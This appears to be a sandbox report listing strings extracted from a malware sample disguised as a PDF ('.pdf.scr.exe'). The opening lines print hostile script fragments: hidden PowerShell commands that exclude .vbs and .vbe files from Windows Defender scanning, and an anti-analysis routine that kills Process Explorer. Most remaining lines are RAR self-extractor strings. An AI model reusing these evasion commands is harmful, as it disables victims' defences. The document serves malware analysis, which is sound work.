Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;endif
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func antianalysis()
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if winexists("process explorer") then
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: winclose("process explorer")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("procexp64.exe")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processclose("procexp.exe")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6ecsz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: 63209-405:en-usenwscript<
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: 23456789
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: h:mm:ss tt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: h:mm tt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: m/d/yyyymmmm yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: dddd, mmmm d, yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: @nvny
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @mhv0lhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv bhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv`phv0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: phv thv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mhvnhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ghvpihv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: qhv`ahv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv@alv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv@jhv vhvpyhv@hhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: hv0xhvpdhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: yhv fhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bhvpghv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @hvpmhvpthvpthv`khv0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wpchv ohvpihv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nhvp[hv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: rhv`ghv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nhvp[hvrhv`ghv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: vhv`vhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: fhvpdhvpphv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: vhv`vhvfhvpdhvpphv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: hv`rhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ehvpxhv0yhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mvpehv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ehv`ehv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: zhv@nhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ihv uhv f
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select * from win32_operatingsystem
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: messages**
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10?.rar.exe.sfx00?<>\|"?%c:\\\?\uncconprnauxnulcom#lpt#messages**messages*r!
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: cryptprotectmemory
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: cryptunprotectmemory
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: xlistpos
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdlldirectoryw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdefaultdlldirectories
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: unknown exception
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad allocation
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: waitformultipleobjects error %d, getlasterror %d
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: thread pool initialization failed.%ls>%s: %s
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: unknown exceptionbad allocation
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: z2fq`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_browsetitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cmdextracting
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_skipping
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_unexpeof
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_fileheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_headerbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_mainheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cmtheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cmtbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_outofmemoryerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_unknownmethod
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotopen
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotcreate
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotmkdir
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_encrcrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extrcrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_packeddatacrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_writeerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_readerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_closeerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotfindvol
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_badarchive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extracting
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_asknextvoltitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_archeaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_done
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_error
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_errors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_bytes
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_modifiedon
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_badfolder
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_createerrors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_restarthint
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_crcerrors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_allfiles
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title1a
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_arcbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extrfilesto
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extrfilestotemp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extractbutton
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extractprogress
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_maxpathlimit
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_unkencmethod
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_wrongpassword
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_wrongfilepassword
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_copyerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotcreatelnks
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotcreatelnkh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_errlnktarget
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_needadmin
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_pause
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_continue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_secwarning
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_secdeldll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idc_destedittitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idc_changedir
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idc_progressbartitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrfileexists
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owraskreplace
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrquestion
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owryes
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrrename
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrno
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrnoall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idc_renamefrom
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idc_renameto
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:idc_passwordenter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idc_nextvolinfo1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idc_nextvolfind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idc_nextvolinfo2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: user32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: gdi32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: comdlg32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: advapi32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: shell32.dll
